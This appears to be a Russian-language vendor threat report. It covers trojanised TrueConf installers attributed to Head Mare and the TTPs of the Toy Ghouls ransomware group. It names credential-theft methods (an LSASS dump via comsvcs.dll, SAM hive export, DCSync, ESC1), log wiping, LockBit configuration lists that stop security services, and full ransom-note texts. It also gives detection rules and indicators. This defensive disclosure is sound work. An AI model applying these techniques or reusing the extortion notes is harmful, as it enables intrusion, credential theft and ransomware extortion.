UPD 20.03.2026: добавили примеры обнаружения атаки в Kaspersky Endpoint Detection and Response Expert, детектирующую логику и дополнительные индикаторы компрометации.

Вредоносная кампания

В феврале 2026 года нами была обнаружена вредоносная кампания группировки Head Mare, нацеленная на образовательные и научные учреждения, а также  организации энергетического сектора в России. Кампания была активна как минимум с декабря 2025 года. Жертвы получали ссылку — приглашение на видеоконференцию. После перехода по ссылке пользователю предлагалось установить сервис для подключения к видеозвонку. В процессе установки происходило заражение системы — на устройство устанавливался ранее неизвестный бэкдор, который мы назвали PhantomPxPigeon.

В настоящее время мы наблюдаем новую волну схожей активности, в частности мы обнаружили целый ряд скомпрометированных серверов TrueConf у различных организаций из области транспорта, а также у научных и образовательных учреждений. Дистрибутивы клиентского приложения TrueConf, которое скачивается с этих серверов, были подменены на вредоносные. Таким образом могли быть скомпрометированы другие организации, сотрудники которых могли установить вредоносные версии клиентского приложения.

Вектор атаки, приводящий к подмене клиентского приложения, на текущий момент неизвестен, но злоумышленники предположительно могли использовать уже известную уязвимость BDU:2025-10116, которая была выявлена исследователями и исправлена вендором в августе 2025 года. В связи с этим мы рекомендуем всем организациям, использующим ПО TrueConf, установить актуальную версию сервера в соответствии с рекомендациями вендора.

Также мы рекомендуем убедиться, что клиентские дистрибутивы, загружающиеся с сервера TrueConf, используемого в организации, имеют действительную цифровую подпись TrueConf и не подменены. Обнаруженные нами вредоносные дистрибутивы не имеют действительной цифровой подписи. Проверить подлинность можно также на сайте производителя.

Детектирование решениями «Лаборатории Касперского»

Для того чтобы проверить в своей инфраструктуре наличие попыток эксплуатации упомянутой уязвимости и связанной с ней вредоносной активности, можно использовать защитные решения «Лаборатории Касперского», такие как Kaspersky Endpoint Detection and Response Expert.

Явным индикатором эксплуатации уязвимости будет являться использование неподписанного установочного файла TrueConf, поскольку легитимные дистрибутивы этого ПО распространяются с корректной цифровой подписью разработчика. Отсутствие подписи или наличие недоверенной подписи может указывать на подмену установочного пакета, его модификацию или использование специально подготовленного файла для эксплуатации уязвимости. Решение KEDR Expert детектирует эту активность с помощью правила unsigned_trueconf_installer.

Детектирование неподписанного установщика в Kaspersky EDR Expert

В рамках сервиса Kaspersky Managed Detection and Response вредоносная активность также обнаруживается.

Правила обнаружения такой атаки для EDR и SIEM можно построить на следующих логиках:

1. Подмена файлов-клиентов приложения TrueConf на сервере TrueConf в директории C:\Program Files\TrueConf Server\ClientInstFiles\;
2. Обращения к подозрительным доменам от процесса клиентского приложения C:\Program Files\TrueConf\Client\TrueConf.exe;
3. Загрузка подозрительных библиотек процессом клиентского приложения C:\Program Files\TrueConf\Client\TrueConf.exe;
4. Обращения процесса C:\Program Files\TrueConf\Client\TrueConf.exe к IP-адресам из необычных регионов;
5. Создание подозрительных файлов и процессов клиентским приложением C:\Program Files\TrueConf\Client\TrueConf.exe;
6. В случае эксплуатации уязвимостей сервера TrueConf необходимо следить за активностью серверного процесса tc_webmgr.exe, такой как создание подозрительных процессов и файлов.

Индикаторы компрометации

Зараженные установочные файлы TrueConf
a92a9b9258091aa47e770d4dea7a19a3
3af8b18ca909072dd08b8603105593fe
51b2e4bb58e7d31101cbb389fda5ea34
419e57227affbed899e7e8388995b956
6ff6b3b56602451486ec46aaf3baf50f
1561054283df80dade88b6366f6a94b2
83d4552f5b03cbad798ddb5ecef73d75
3244e1ba4c477da4d56267efc6ae77eb
1eab157b9a32c75fbac1dbb6475d51b5

Вредоносная нагрузка
bcf39d3ed3110fa2b1c13bb1192a4d31
577713df800f6ac690cb2189a4b036e9
2e0be66779b6fbd103f525e6e773a3b8
b83c970bb871b56ed6746c757700d92e
8a1e4537ff319920602a2642083eb2ab
5c82f1363fd8805875eb2a9c3d0a5dec
ea5f0bab47e33e63d8894ea4154491d2
a8d26d296100342d0c9e0b688c607d73
aa9722e369ea0be406494101e5d240de

C2
ironshieldsecurity[.]space
primeinfosec[.]space

Toy Ghouls (также известные как bearlyfy или laboo.boo) — это еще одна группа, нацеленная на российские организации. Злоумышленники действуют как минимум с января 2025 года и преследуют финансовые цели (занимаются вымогательством). При этом они не разрабатывают собственные инструменты, а полагаются преимущественно на общедоступные утилиты и слитый код. В качестве финальной полезной нагрузки группа использует программы-вымогатели из семейств LockBit и RedAlert для систем Windows, а также Babuk для Linux и ESXI.

Toy Ghouls отличаются креативным подходом к созданию записок о выкупе. Злоумышленники представляются монстром Лабубу и часто включают в свои послания аллюзии на сферу деятельности атакованной компании и едкие шутки в ее адрес. Также в активности Toy Ghouls мы обнаружили признаки возможной связи с группой Head Mare, в частности — совпадения в используемых инструментах и сетевой инфраструктуре.

В этой статье мы разберем тактики, техники и процедуры Toy Ghouls по модели Unified Kill Chain.

Initial Access: атаки через подрядчиков и общедоступные сервисы

Чаще всего злоумышленники получают доступ к системам жертв либо через скомпрометированную инфраструктуру подрядчиков, либо через общедоступные сервисы. В большинстве атак, которые мы наблюдали, они использовали протокол RDP (Remote Desktop Protocol) и злоупотребляли действительными локальными или доменными учетными записями, чьи учетные данные OpenVPN или SSH были скомпрометированы. Оказавшись внутри инфраструктуры, Toy Ghouls предпринимали попытки горизонтального перемещения при помощи того же протокола RDP.

Exploitation: вредоносные внешние обработки 1C-Shell

Группа Toy Ghouls использует небезопасную конфигурацию серверов 1C, чтобы загружать на них 1C-Shell. Этот инструмент представляет собой вредоносный файл внешней обработки для ПО «1С:Предприятие» в формате EPF, который позволяет злоумышленнику выполнять системные команды, файловые операции, запускать скрипты, перечислять пользователей и роли, а также выполнять SQL-запросы на сервере 1C с привилегиями сервера.

«1С:Предприятие» — это универсальная платформа для автоматизации финансовых и других процессов компании. Файлы EPF в норме содержат код для расширения функциональности платформы, генерации отчетов или автоматизации процессов.

Пример выполнения команды через 1C-Shell

Persistence: NSSM, учетные записи и задачи планировщика

Toy Ghouls используют NSSM для создания или изменения служб Windows, которые запускают вредоносные исполняемые файлы:

Также для обеспечения постоянного доступа к скомпрометированному хосту злоумышленники создают новые локальные учетные записи с помощью системной утилиты net.exe:

Еще один метод закрепления в системе, выполнения вредоносных действий и инструментов — запланированные задачи. С их помощью группа Toy Ghouls, в частности, создает SSH-туннели и отключает виртуальные машины:

Defense Evasion: заметание следов и изменение настроек брандмауэра

Утилиты и результаты их работы, которые больше не нужны на скомпрометированных машинах, злоумышленники удаляют. В частности, Toy Ghouls удаляют файлы сеансов RDP, такие как Default.rdp, чтобы скрыть следы активности во время удаленного доступа, перед этим изменяя их атрибуты, чтобы обеспечить возможность их стереть:

Также, чтобы очистить историю подключений RDP, злоумышленники удаляют или изменяют ключи реестра служб терминалов:

Чистке подвергаются и журналы событий Windows. Это затрудняет восстановление последовательности действий атакующих. В одних случаях записи удаляют при помощи wevtutil.exe:

В других очистка журналов происходит через PowerShell:

Помимо истории своей активности Toy Ghouls удаляют промежуточные файлы, созданные при установке или доставке в систему различных инструментов. К таким файлам относятся, например, ZIP-архивы с различными утилитами, которые злоумышленники загружают в систему во время атаки. Таким образом они пытаются усложнить анализ и реагирование на инциденты.

Кроме затруднения обнаружения и анализа злоумышленников интересует обход средств защиты, ограничивающих доступ к нужным им ресурсам. Так, для подключения к внутренним службам они изменяют конфигурацию брандмауэра. Приведенная ниже команда, например, дает им доступ к базам SQL:

Command & Control: доставка инструментов в систему

В ходе своих атак группа часто доставляет на атакуемые хосты утилиты, которые впоследствии помогут злоумышленникам перемещаться по сети — OpenSHH и localtonet. Мы наблюдали три метода доставки этих утилит в систему.

Первый метод злоумышленники используют для доставки OpenSSH. Он состоит в том, что утилиту устанавливают с GitHub с помощью msiexec.exe. Ниже приведен список команд, выполняемых из командной оболочки злоумышленника при доставке ПО этим методом:

Второй метод — это использование утилиты certutil.exe, через которую Toy Ghouls также загружают OpenSSH непосредственно с GitHub:

Скачанный архив распаковывают в каталог C:\Users\Public\:

В некоторых атаках описанные выше действия выполнялись путем запуска команд на сервере 1C, но журналы 1C не записывали события полностью.

Третий способ использует скрипт, который выполняет команду Invoke-WebRequest в PowerShell для получения удаленных полезных нагрузок, а затем извлекает их в каталоги с правами записи, такие как C:\Windows\Temp, с помощью команды Expand-Archive:

Pivoting: SSH-туннели и общедоступные утилиты

Основной метод перенаправления трафика, используемый Toy Ghouls, заключается в применении обратного SSH-туннеля с использованием переадресации портов (-R) для обеспечения доступа к серверу внешнего хоста. Это позволяет злоумышленникам получать скрытый удаленный доступ или связь с C2 в обход входящих сетевых ограничений:

Злоумышленники также используют утилиты GOST, rsocx, cloudflared и localtonet для перенаправления трафика.

Discovery: разведка с помощью общедоступных и системных утилит

Для разведки внутренней сети злоумышленники используют сканеры сети SoftPerfect и fscan, которые способны искать и использовать уязвимости. Эти утилиты они размещают по следующим путям:

С:\Users\[USER]\Documents\netscan.exe
С:\Users\[USER]\Desktop\netscan.exe
С:\Users\[USER]\Downloads\fscan.exe

Информацию о пользователях в системе, доступности сети и открытых портах они получают с помощью системных утилит query.exe, netstat.exe и ping.exe:

Еще один инструмент, который помогает злоумышленникам изучать жертву, — утилита AdExplorer из пакета Sysinternals Suite, предназначенная для просмотра и анализа структуры Active Directory:

C:\Users\[USER]\Downloads\AdExplorer\ADExplorer64.exe
C:\Users\[USER]\Downloads\AdExplorer.zip;
C:\Users\[USER]\Downloads\PSTools.zip;
c:\users\[USER]\downloads\adexplorer\adexplorer64.exe

Также за злоумышленниками замечено использование в разведывательных целях целого ряда утилит из пакета PSTools, предназначенных для выполнения команд на удаленной машине, просмотра и удаления процессов, управления службами и сбора системной информации:

C:\Users\[USER]\Downloads\PSTools\psfile.exe;
C:\Users\[USER]\Downloads\PSTools\psfile64.exe;
C:\Users\[USER]\Downloads\PSTools\PsExec.exe;
C:\Users\[USER]\Downloads\PSTools\PsExec64.exe;
C:\Users\[USER]\Downloads\PSTools\PsGetsid.exe;
C:\Users\[USER]\Downloads\PSTools\pspasswd.exe;
C:\Users\[USER]\Downloads\PSTools\psping64.exe;
C:\Users\[USER]\Downloads\PSTools\psping.exe;
C:\Users\[USER]\Downloads\PSTools\psloglist64.exe;
C:\Users\[USER]\Downloads\PSTools\pspasswd64.exe;
C:\Users\[USER]\Downloads\PSTools\psloglist.exe;
C:\Users\[USER]\Downloads\PSTools\PsLoggedon64.exe;
C:\Users\[USER]\Downloads\PSTools\PsLoggedon.exe;
C:\Users\[USER]\Downloads\PSTools\pslist64.exe;
C:\Users\[USER]\Downloads\PSTools\pslist.exe;
C:\Users\[USER]\Downloads\PSTools\pskill64.exe;
C:\Users\[USER]\Downloads\PSTools\pskill.exe;
C:\Users\[USER]\Downloads\PSTools\PsInfo64.exe;
C:\Users\[USER]\Downloads\PSTools\PsInfo.exe;
C:\Users\[USER]\Downloads\PSTools\PsGetsid64.exe;

Чтобы проверить, запущена ли система в среде Hyper-V или Azure, а также извлечь параметры реестра, переданные хостовой системой, злоумышленники читают данные из реестра при помощи следующей команды:

Тип устройства они определяют с помощью WMI. Приведенная ниже команда позволяет получить числовой код, указывающий на тип устройства:

Privilege Escalation: учетные записи

Для повышения привилегий злоумышленники часто используют полученные на этапе первоначального проникновения привилегированные учетные записи скомпрометированных подрядчиков. При необходимости они могут также создавать дополнительные учетные записи и добавлять их в административные группы:

Execution: запланированные задачи, командные оболочки и PAExec

Группа Toy Ghouls выполняет различные действия на скомпрометированных хостах при помощи запланированных задач. Также злоумышленники используют PowerShell для выполнения вредоносных скриптов, командную оболочку Windows для выполнения команд в этой ОС и Bash для выполнения команд в системах *nix.

Например, ниже приведен список команд, с помощью которых злоумышленники проверяли активные пользовательские сессии в системе, вызывали ntdsutil и проверяли, запущен ли сетевой сканер SoftPerfect:

Также с помощью локальных команд Toy Ghouls просматривали пользовательские сессии в различных системах, пытались устанавливать исходящие SSH-соединения, просматривали процессы на системных портах, пытались установить обратный SSH-туннель, просматривали пользовательские группы и добавляли в них новых членов:

Для удаленного выполнения команд на скомпрометированных хостах группа использует утилиту PAExec, которая позволяет:

• выполнять команды на удаленной машине;
• выполнять команды с указанными учетными данными;
• выполнять команды с правами SYSTEM;
• передавать файлы;
• запускать процессы как службы.

Злоумышленники обычно размещают PAExec по следующим путям:

C:\Users\[USER]\Desktop\paexec.exe
C:\Users\[USER]\Pictures\paexec.exe

Credential Access: от стандартных уловок до продвинутой техники компрометации домена

Toy Ghouls используют утилиту tasklist.exe для получения идентификатора процесса lsass.exe, а затем вызывают rundll32.exe с экспортом MiniDump из comsvcs.dll (функция #24), чтобы сгенерировать полный дамп памяти LSASS для извлечения учетных данных:

Также они выгружают конфиденциальные разделы реестра Windows, такие как SAM, SECURITY и SYSTEM, используя функцию reg save, чтобы получить данные учетных записей и системные секреты для дальнейшего закрепления либо продвижения в инфраструктуре:

Как и многие злоумышленники, Toy Ghouls используют инструмент mimikatz, чтобы получить доступ к секретам LSA, извлечь данные из LSASS и другие учетные данные. Обычно группировка размещает этот инструмент по следующим путям на скомпрометированных хостах:

C:\install\mimikatz.exe
C:\temp\calc.exe
С:\Users\[USER]\Downloads\calc.exe
C:\Users\[USER]\Pictures\calc.exe,
C:\install\mimikatz.log
C:\Users\[USER]\Downloads\mimikatz.log
C:\Users\[USER]\Pictures\mimikatz.log,
C:\Users\[USER]\Downloads\mimikatz.exe
C:\install\1.txt

Кроме того, мы обнаружили следы применения техник Pass-the-Hash, Overpass-the-Hash и DCSync, также с помощью инструмента mimikatz. Злоумышленники задействовали эти техники как для горизонтального перемещения, так и для полной компрометации инфраструктуры домена:

Помимо атак на уровне домена, злоумышленники активно применяют технику ESC1, если в домене присутствует некорректная конфигурация. Атакующие ищут уязвимые шаблоны с установленным флагом CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, который позволяет учетной записи, запрашивающей сертификат, указывать любое значение поля Subject Alternative Name, включая имя основного пользователя с правами администратора домена. Как следствие, они сами себе выдают сертификаты, в том числе для привилегированных учетных записей, и затем используют их для аутентификации клиентов.

Чтобы обойти полнодисковое шифрование, злоумышленники с помощью команды manage-bde запрашивают у механизма защиты BitLocker пароль восстановления, связанный с зашифрованным томом. Это позволяет им разблокировать зашифрованные диски или получить к ним доступ:

Дополнительно злоумышленники пытаются извлечь учетные данные из менеджеров паролей, браузеров и клиентов удаленного доступа. Собранную из них информацию они сохраняют по следующим путям:

C:\Users\[USER]\Documents\yandex_browser_passwords_2025-[DATE].csv
C:\Users\[USER]\Documents\БазаПаролей.xml
C:\Users\[USER]\Documents\Пароли Chrome.csv
C:\Intel\results-2025-[DATE].zip
C:\Intel\results-2025-[DATE].zip
C:\Intel\rdp.rdm

• CSV-файлы представляют собой экспорт паролей из браузеров Yandex и Google Chrome.
• XML-файл — это дамп базы данных менеджера паролей KeePass.
• ZIP-архивы содержат дампы базы данных менеджера паролей Passwordstate, которые представляют собой текстовые CSV-файлы с учетными данными в открытом виде.
• Файл rdp.rdm — это текстовый XML-файл, содержащий импорт сессий Devolutions Remote Desktop Manager без указания учетных данных. Злоумышленники используют информацию из этого файла, чтобы определить дальнейший маршрут для горизонтального перемещения.

Lateral Movement: SSH и инструменты удаленного администрирования

Основной метод горизонтального перемещения, используемый группой Toy Ghouls, заключается в развертывании и запуске ssh.exe в скомпрометированной системе для обеспечения исходящего удаленного доступа через SSH-каналы. Кроме того, группа использует инструменты удаленного администрирования, такие как MeshAgent, RuDesktop и AnyDesk, а также встроенные в систему инструменты RDP.

Collection + Exfiltration

Проведенные исследования атак этой группы не выявили никаких признаков сбора или утечки конфиденциальных данных с целью последующей дискредитации жертв. Мы также не обнаружили сайтов для слива данных (DLS), принадлежащих этой группе. Вероятнее всего, злоумышленники действуют по упрощенной схеме вымогательства: шифруют данные и требуют выкуп за их восстановление.

Impact: шифрование с огоньком

Для шифрования данных группа Toy Ghouls использует три семейства программ-вымогателей: RedAlert, Babuk и LockBit. Babuk злоумышленники запускают в Unix-подобных системах, а также на устройствах NAS. Версия шифровальщика, которую мы видели в атаках, написана на языке Golang.

RedAlert и LockBit шифруют машины под управлением Windows. RedAlert удаляет теневые копии, очищает журналы событий Windows и историю RDP. Также он может изменять обои рабочего стола на сообщение с требованием выкупа, но злоумышленники не используют эту функциональность. Вместо этого они оставляют записку о выкупе в текстовом файле. Для шифрования файлов RedAlert использует потоковый шифр ChaCha с аутентификацией Poly1305. Для каждого файла зловред генерирует уникальный ключ ChaCha, а затем шифрует его с помощью асимметричной криптосистемы NTRUEncrypt с открытым сессионным ключом NTRU, сгенерированным при запуске вредоносной программы. Закрытый сессионный ключ NTRU шифруется с использованием главного открытого ключа NTRU злоумышленников, который встроен в тело троянца. Без закрытого ключа расшифровать данные невозможно.

Если говорить про LockBit, то злоумышленники используют образцы из семейства LockBit 3.0, созданные с помощью общедоступного билдера. Это ПО шифрует файлы на дисках и смонтированных сетевых ресурсах при помощи потокового шифра Salsa20 и удаляет теневые копии. Как и в случае с RedAlert, расшифровка невозможна без закрытого ключа злоумышленников.

Общая конфигурация всех образцов LockBit, используемых группой, представлена ниже:

Также в конфигурации заданы следующие ограничения шифрования файлов.

• Список директорий, файлы в которых не шифруются:
  

  0x71334bfd;0x41471897;$recycle.bin;config.msi;$windows.~bt;$windows.~ws;windows;0xc74e5755;0xe52abb99;boot;program files;program files (x86);programdata;system volume information;torbrowser;windows.old;intel;0xe52abb99;0xc74e5755;msocache;perflogs;x64dbg;public;all users;default;microsoft

• Список файлов, которые не шифруются:
  

  autorun.inf;boot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntldr;ntuser.dat;ntuser.dat.log;ntuser.ini;thumbs.db

• Список расширений, файлы с которыми не шифруются:
  

  386;0x67b80e00;adv;ani;bat;bin;cab;cmd;com;cpl;cur;deskthemepack;diagcab;diagcfg;diagpkg;dll;drv;exe;hlp;icl;icns;ico;ics;idx;ldf;lnk;mod;mpa;msc;msp;msstyles;msu;nls;nomedia;ocx;prf;ps1;rom;rtp;scr;shs;spl;sys;theme;themepack;wpx;lock;key;hta;msi;pdb;search-ms

Перед началом шифрования LockBit 3.0 завершает ряд процессов и сервисов, заданных в конфигурации.

• Список процессов, которые пытаются остановить варианты, замеченные в атаках Toy Ghouls:
  

  vmwp;vmms;vmcompute;rhs;iscsidcb;vmwp;sql;oracle;ocssd;dbsnmp;synctime;agntsvc;isqlplussvc;xfssvccon;mydesktopservice;ocautoupds;encsvc;firefox;tbirdconfig;mydesktopqos;ocomm;dbeng50;sqbcoreservice;excel;infopath;msaccess;mspub;onenote;outlook;powerpnt;steam;thebat;thunderbird;visio;winword;wordpad;notepad;calc;wuauclt;onedrive

• Список сервисов, которые пытается остановить вариант Toy Ghouls:
  

  vss;AVP;KAVFS;WinDefend

Записки с требованием выкупа

Отдельный интерес представляют записки Toy Ghouls о выкупе. Они могут выглядеть минималистично и не содержать практически никакой информации, кроме идентификатора жертвы и контактов злоумышленников, или представлять собой довольно креативные образцы. Последние содержат множество эмодзи, художественные образы с отсылкой к отрасли, в которой работает жертва, и претендуют на остроумность. Вот несколько примеров.

Примеры минималистичных записок:

[VICTIM ID REDACTED]
Mail us for decryption
[REDACTED]@laboo.boo

[VICTIM ID REDACTED]
24/7
Быстрая компьютерная помощь онлайн
EMAIL: [REDACTED]@laboo.boo
Быстрая компьютерная помощь онлайн
24/7

Записка, нацеленная на жертву из строительной отрасли:

🏗️ ВАС ПОСЕТИЛ ЛАБУБУ! 🏗️

Сегодня я надел каску, взял лопату и решил:
"А не построить ли себе домик… из ваших файлов?" 🧱
Так что теперь ваши документы, фото и прочее — часть стройматериалов ЛАБУБУ.

Не переживайте, фундамент крепкий, крыша не течет — все в безопасности. Но ключи от дома пока у меня. 🔑😎

🚫 Что нельзя делать:

Не перезагружать компьютер! Это как сбить бетон до того, как он застыл — трещины гарантированы.

Не тушить процессы шифровальщика! Прервете стройку — и ваши файлы превратятся в кучу битого кирпича.

✅ Что нужно делать:

Написать на почту: [email protected]

Указать уникальный строительный номер (он же идентификатор): 
[REDACTED]

Получить инструкцию, как "выкупить квартиру" в доме ЛАБУБУ и вернуть свои файлы.

⏰ Условия:

У вас есть 48 часов, чтобы связаться со мной. Потом цена удвоится — стройматериалы дорожают!

Если решите не платить — ну что ж… ваш "домик из файлов" я снесу бульдозером. 🚜

⚠️ Важно:

Не пытайтесь сами "ремонтировать" файлы. Это как штукатурить по обоям — все равно трещины будут.
Дайте ЛАБУБУ закончить стройку!

С кирпичами, цементом и шифрованием,
👷‍♂️ Ваш ЛАБУБУ

"Стройка века — ваши файлы в надежном подвале ЛАБУБУ."

Записка, нацеленная на жертву из нефтегазовой отрасли:

💰 ВАС ПОСЕТИЛ НЕФТЯНОЙ МАГНАТ ЛАБУБУ! 💰

Здравствуйте, уважаемый владелец данных!
Сегодня я, ЛАБУБУ, открыл новое месторождение — прямо на вашем компьютере.
Битовая нефть, байтовый газ и цифровое золото — все это теперь добывается под брендом LABOOBOO OIL & DATA Co. 🛢️

Ваши файлы теперь в моем подземном хранилище. Не волнуйтесь, давление стабильное, но бурить туда без лицензии нельзя.

🚫 Что нельзя делать:

Не перезагружайте компьютер — скважина активна!

Не тушите процессы шифровальщика — это как перекрыть вентиль под давлением: может рвануть так, что файлы расплескаются по секторам.

✅ Что нужно делать:

Свяжитесь с центральным офисом по почте [redacted]@laboo.boo

Укажите свой идентификатор скважины: [REDACTED]

Получите инструкцию по безопасной "дебуровке" — возвращению файлов на поверхность.

⏰ Условия сделки:

У вас есть 48 часов, чтобы выйти на связь. Потом цена на баррель шифрования взлетит в два раза — рынок, знаете ли. 📈

Если решите не платить — ваше цифровое месторождение будет законсервировано навечно.

⚠️ Важно:

Не пытайтесь самостоятельно чинить или копать глубже.
Вы не бурильщик — вы пользователь. А ЛАБУБУ — весь нефтяной концерн в одном лице. 😎

С запахом нефти, байтов и легким налетом цинизма,
👔 Ваш ЛАБУБУ, владелец LABOOBOO OIL & DATA Co.

'Я не ворую файлы — я просто добываю цифровые ресурсы.'

Записка, нацеленная на жертву из сектора общественного питания:

🥐 ВАС ПОСЕТИЛ ПЕКАРЬ ЛАБУБУ! 🥐

Добро пожаловать в пекарню ЛАБУБУ!
Сегодня я встал пораньше, надел фартук и решил испечь свежие булочки... из ваших файлов. 🧁
Теперь все замешано, просеяно и надежно спрятано в духовке моего шифровальщика.

🚫 Что нельзя делать:

Не перезагружайте компьютер — тесто еще поднимается!

Не тушите процессы шифровальщика — иначе оно "опадет", и ваши файлы превратятся в черствый батон. 🍞

✅ Что нужно делать:

Написать письмо в пекарню на адрес [email protected]

Указать ваш рецепт... ой, то есть идентификатор: {{IDENTIFIER}}

Дождаться инструкции от шеф-пекаря, как вернуть ваши файлы из духовки в исходный вид.

⏰ Условия выпечки:

У вас есть 48 часов, чтобы сделать заказ. Потом цена удвоится — мука дорожает!

Если не свяжетесь со мной, все тесто осядет, а файлы сгорят — и тогда будет только запах свежего... но утерянного хлеба.

⚠️ Важно:

Не пытайтесь "исправить" файлы самостоятельно. Это как добавлять соль после выпечки — поздно и бесполезно.
Дайте ЛАБУБУ закончить свое кулинарное чудо! 👨‍🍳

С ароматом свежего шифрования,
🥖 Ваш ЛАБУБУ-ПЕКАРЬ

'Я не ворую файлы — я просто их тщательно просеиваю!'

Шифрование виртуальных машин

Помимо локальных дисков и сетевых ресурсов злоумышленники пытаются зашифровать диски виртуальных машин. Для этого их предварительно останавливают через командную оболочку. Ниже приведены команды, используемые злоумышленниками для остановки виртуальных машин в Hyper-V и VMware ESXi:

Детектирование решениями «Лаборатории Касперского»

Защитные решения «Лаборатории Касперского» успешно выявляют всю вредоносную активность в рамках описанных атак. В этом разделе мы разберем наиболее интересные сценарии обнаружения.

В Kaspersky Endpoint Detection and Response Expert детектировать активность Toy Ghouls можно посредством мониторинга использования comsvcs.dll в нетипичном контексте. В частности, для злоумышленников характерен запуск этой библиотеки через rundll32.exe с указанием экспортируемой функции, предназначенной для создания дампа процесса. В реальных административных сценариях такой подход применяется крайне редко. Особое внимание следует уделять случаям, когда в качестве целевого процесса выступает lsass.exe, поскольку он содержит в памяти учетные данные. Kaspersky EDR Expert детектирует эту активность с помощью правила dumping_memory_with_com_services_dll.

Также можно детектировать использование инструмента PAExec с помощью мониторинга создания характерных именованных каналов и типичных цепочек событий, возникающих при его работе в режиме удаленного выполнения команд. PAExec разворачивает в целевой системе временный сервис, который инициирует запуск дочерних процессов. Аномалией можно считать появление нового сервиса с типичным для инструмента именем, последующий запуск исполняемого файла этого сервиса и создание им подозрительных дочерних процессов. Kaspersky EDR Expert детектирует эту активность с помощью правил: paexec_possible_activity_proc и remote_access_tools_pipe_created.

Еще одним ярким признаком вредоносной активности является массовая очистка журналов событий с использованием утилиты wevtutil, поскольку в штатной административной практике очистка логов, как правило, выполняется точечно и крайне редко затрагивает сразу несколько журналов подряд. Злоумышленники применяют команду wevtutil cl для удаления следов своей деятельности, стремясь скрыть факты входа в систему, повышения привилегий, создания служб, запуска подозрительных процессов или иных действий, отражающихся в Security, System, Application и других журналах. Особую настороженность должна вызывать последовательная очистка большого количества журналов в короткий промежуток времени. Kaspersky EDR Expert детектирует эту активность с помощью правила clear_event_log_using_standard_tools.

Вредоносною активность в сетевом трафике можно обнаружить с помощью Kaspersky Anti Targeted Attack (KATA) с модулем NDR. Например, для детектирования коммуникаций по протоколу TCP с помощью инструмента localtonet можно использовать сигнатуру NetTool.TunnelLocaltonet.TCP.C&C.

А при обнаружении активного туннеля GOST (GO Simple Tunnel) по протоколу DTLS в интерфейсе продукта создается оповещение с именем HackTool.GOSimpleTunnel.DTLS.C&C.

Помимо активности этих двух инструментов продукт обнаруживает в сетевом трафике следующие действия группы Toy Ghouls:

• удаленное создание запланированных задач;
• работу инструментов для разведки внутренней сети;
• атаки на Active Directory (DCSync, атаки на AD CS и др.);
• активность инструментов удаленного администрирования.

Пересечения с активностью Head Mare

В ходе исследования активности Toy Ghouls мы выявили ряд пересечений с инфраструктурой и инструментарием хактивистской группировки Head Mare. Этих данных недостаточно, чтобы говорить о совместной деятельности злоумышленников, однако они могут указывать на частичное совпадение инфраструктуры или обмен инструментами.

Прежде всего, мы обнаружили пересечения в C2-инфраструктуре. Так, IP-адрес 195.133.32[.]213, который Toy Ghouls использовали в качестве управляющего сервера в одной из атак, ранее неоднократно фигурировал в операциях Head Mare. В частности, с ним связывался инструмент PhantomProxyLite. По данным нашего портала Threat Intelligence, группа Head Mare активно использовала этот IP-адрес в атаках как минимум с августа 2025 года.

Информация о C2 195.133.32[.]213 на Kaspersky Threat Intelligence Portal (TIP)

• nextcloud.soft-trust[.]com
• 31.56.27[.]60

Дополнительным косвенным признаком пересечения является сходство в структуре и наименовании доменной инфраструктуры. В атаках Toy Ghouls были зафиксированы домены:

• akselerator.1cbit[.]dev
• nextcloud.1cbit[.]dev

Доменное имя 1cbit[.]dev схоже с доменным именем 1cbit-dev[.]com, фигурировавшим в недавней кампании Head Mare, что может свидетельствовать о схожем подходе к построению инфраструктуры или ее частичном совместном использовании.

Помимо инфраструктурных совпадений, обращает на себя внимание схожесть отдельных образцов шифровальщика LockBit. Так, образец 4BE346685D266967A33A1035A4BCD35E (dondon.exe), использованный в атаках Head Mare, по данным сервиса Kaspersky Similarity, демонстрирует высокий уровень сходства с образцами LockBit, замеченными в атаках Toy Ghouls:

• b13010e837f8375cee6f5d2509957c4e,
• 8ab9b1ae88020a3b534c1dc453ce1c7b,
• b5e145e94feca4fa8d6ac777f2ac7c65.

Информация о схожих образцах LockBit на Kaspersky TIP

В совокупности эти пересечения могут указывать на использование общей инфраструктуры и инструментов. Также нельзя исключать возможность того, что две группы проводили отдельные совместные операции, однако, чтобы с уверенностью это утверждать, у нас недостаточно данных.

Заключение

Угрозы на российском рынке динамично меняются: все больше групп объединяют свои ресурсы, используют общую инфраструктуру и перенимают друг у друга методы и инструменты. Многие из них значительно повышают уровень своих навыков. В новых атаках они активно эксплуатируют уязвимости доменной инфраструктуры и используют техники, основанные на доменных механизмах, стремятся действовать более скрытно и все чаще переходят на использование легитимных утилит и методов Living Off the Land (использование штатных инструментов системы для вредоносной активности). К таким группам можно отнести и Toy Ghouls. При этом злоумышленники, как это свойственно вымогателям, оставляют свой автограф и контактную информацию в записках с требованием выкупа.

Судя по манере написания записок, содержащих сложные речевые конструкции и едкие шутки, направленные на жертв, злоумышленники свободно говорят по-русски. При этом есть признаки возможных связей Toy Ghouls с хактивистами Head Mare: отдельные инструменты двух групп демонстрируют высокий уровень сходства, частично совпадает сетевая инфраструктура.

Индикаторы компрометации

Дополнительные индикаторы компрометации доступны клиентам сервиса Threat Intelligence. Для получения более подробной информации свяжитесь с нами по адресу [email protected].

Хэши файлов

RedAlert
fde0fe1f9475c48453b1ec4aa51c9cd2
1662c4c2c28852d778d37e224ed50c1b
8c380b162797a423bb89877b950d6b81

LockBit
b13010e837f8375cee6f5d2509957c4e
6c0b4bd995d72e27342da02497e03cb1       gse.exe
098ab89af8683d4a75b4f3e049d6d5a4       igsv.exe
b597171ba434af699fa5939188a32065       oil.exe
ad3720c364e79b1023ce4e9d504e8913       far.exe
8ab9b1ae88020a3b534c1dc453ce1c7b       oil.exe
b5e145e94feca4fa8d6ac777f2ac7c65
9a8baf8a5ec7a0923d45d0f1177060d5

Babuk (for Linux)
f05b0b339b55005d9694ee011cc9f84c       e_nas_amd64.out

Socks5Proxy
cd915c6d6cb455fb2786cb4e2debdafc       rx.exe/hosts.exe

Advanced IP Scanner
b3411927cc7cd05e02ba64b2a789bbde       advanced_ip_scanner.exe
5537c708edb9a2c21f88e34e8a0f1744       ip.exe

Вредоносные файлы внешней обработки для «1С:Предприятие»
a2b67d4329a0207c9589255b0cc300a4       fix.epf
d29d9b9eb73fb72aa9d4392f552c7cf9       Исправление.epf/ЗагрузкаXML.epf

mimikatz
e930b05efe23891d19bc354a4209be3e       mi.exe
